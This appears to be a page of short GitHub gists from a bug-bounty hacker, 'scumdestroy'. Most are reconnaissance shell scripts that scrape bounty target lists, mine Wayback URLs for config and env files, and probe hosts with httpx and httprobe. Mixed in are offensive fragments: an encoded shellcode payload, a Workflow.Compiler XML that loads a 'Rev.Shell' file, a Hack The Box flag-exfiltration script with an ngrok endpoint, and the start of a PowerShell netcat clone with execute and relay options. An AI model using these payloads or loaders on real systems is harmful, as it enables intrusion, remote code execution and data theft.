scumdestroy

#!/bin/sh

echo "\nTIME TO DROP OSBOMBS ON YOU, BOYEEEEEE\n»»————-　☠　————-««\n""

echo "HERE COME DA ASSETS\n»»————-　☠　————-««\n"
assets
cat "/root/.osmedeus/storages/$1/assets/*" | tee ~/opps/osmedeus-$1

echo "\n\n HTTP OK THEN \n»»————-　☠　————-««\n"
cat "/root/.osmedeus/storages/$1/http/*" | tee -a  ~/opps/osmedeus-$1

scumdestroy

<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
  <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
    <d2p1:string>Rev.Shell</d2p1:string>
  </files>
  <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
    <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
    <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />

scumdestroy

<html>
<script>
var local_ip = '127.0.0.1:1337';
var url = "http://${local_ip}/api/entries/search?q="
var ngrok = '3b3b-2600-6c50-7b7f-4c50-e133-2ebe-33a2-360b.ngrok.io';
var flag = 'HTB{';
var char_list = '!@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-' ;

async function getChunck(char){
	return new Promise((resolve, reject)=>{

scumdestroy

\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x25\x94\x3c\x53\x4e\xad\x35\xd2\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd9\xdc\xbf\xb7\xbe\x45\xf9\xd2\x25\x94\x7d\x02\x0f\xfd\x67\x9a\x14\x46\x59\x1b\xc5\xff\x55\x9a\xae\xc6\x24\x02\x18\xe5\xbe\x80\x05\xdc\xb7\x21\x1e\xe0\x04\x1b\x6d\x9b\x8b\x19\x04\xe5\x04\x12\x89\xa8\x5d\x2f\x4c\x81\x15\x93\xe4\x5d\x31\x12\x4f\x6c\xd7\x3f\x77\xd5\x6d\x1b\xc5\xff\x15\x59\x67\xa8\x74\x52\x9e\xcb\xb4\xaa\x3d\x9f\x3e\x5c\xcb\xdf\x35\xd2\x25\x1f\xbc\xdb\x4e\xad\x35\x9a\xa0\x54\x48\x34\x06\xac\xe5\x96\xae\xd4\x1c\x03\xc5\xe5\x2d\x9b\x24\x44\xdf\x05\x03\x9c\xfc\x9a\xda\x5d\x7d\xd8\x7a\x25\x7d\xd3\xf3\xdc\x0d\x93\x0f\x6c\xfc\xdf\x89\xd5\x3d\x92\x76\x4d\x40\x23\x69\x97\x70\x77\x46\xe8\x0c\x03\x50\x4c\x64\x17\xc5\xed\x11\x9b\x24\x44\x5a\x12\xc5\xa1\x7d\x96\xae\xd4\x20\x1a\x4f\x7d\x74\x59\x21\x1c\x7d\x0b\x0f\xf5\x6b\x9a\x24\x44\x65\x09\x0f\xf5\x74\x8b\x64\xce\x74\xd0\xa2\x8d\x74\x80\xda\x74\x64\x12\x17\xf7\x7d\x59\x37\x7d\x77\xac\xb1\x52\x68\x9b\x9b

scumdestroy

function mamacat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    [alias("Port")][Parameter(Position=-1)][string]$p="",
    [alias("Execute")][string]$e="",
    [alias("ExecutePowershell")][switch]$ep=$False,
    [alias("Relay")][string]$r="",
    [alias("UDP")][switch]$u=$False,

scumdestroy

Keybase proof

I hereby claim:

• I am scumdestroy on github.
• I am scumdestroy (https://keybase.io/scumdestroy) on keybase.
• I have a public key ASASXW521FiI8a2jQtGEpj-qEwk8t5Z0zFJkzgeMmZ6hDAo

To claim this, I am signing this object:

scumdestroy

#!/bin/sh

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee bugcrowd-wildcards  

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'| grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee federacy-wildcards

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee h1-wildcards


curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'   grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee intigriti-wildcards  

scumdestroy

#!/bin/sh

echo $1 | waybackurls > wayback-results

cat wayback-results | grep "\.conf" | tee $1-poorGF
cat wayback-results | grep "\.xml"  | tee -a $1-poorGF
cat wayback-results | grep "\.db"	| tee -a $1-poorGF
cat wayback-results | grep "\.log"	| tee -a $1-poorGF
cat wayback-results | grep "config" | tee -a $1-poorGF
cat wayback-results | grep "env"	| tee -a $1-poorGF

scumdestroy

#!/bin/sh

httpx -vhost -sc -td -ip -cname -asn -cdn  -t 169 -rl 250 -tls-probe -csp-probe -tls-grab -pipeline -http2 -vhost  -websocket -web-server  -title -location -follow-host-redirects -cl -ct  -cdn  -ports 80,8080,443,8443,8008,9200,9300,8090,8081,8180 -http2  -r /root/resolvers/resolvers.txt -random-agent -fr  | tee httpx-heavy
cat httpx-heavy | awk '{print $NF}' | sed 's/\[//g' | sed 's/\]//g'| sort -u > httpx-ips
cat httpx-heavy | grep 200 | awk '{print $1}'  > httpx-200s
cat httpx-heavy | grep 403 | awk '{print $1}'  > httpx-403s
cat httpx-heavy | grep 401 | awk '{print $1}' | tee -a httpx-403s

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' httpx-heavy > httpx-ips-new

scumdestroy

 #!/bin/sh

httprobe -p http:81 -p https:8443 -p http:8000 -p http:8001 -p http:8080 -p http:8181 -p http:50070 -p http:9200 -p http:2181 -p http:8083 -p http:9090 -p http:8081 -p http:8090 -t 40000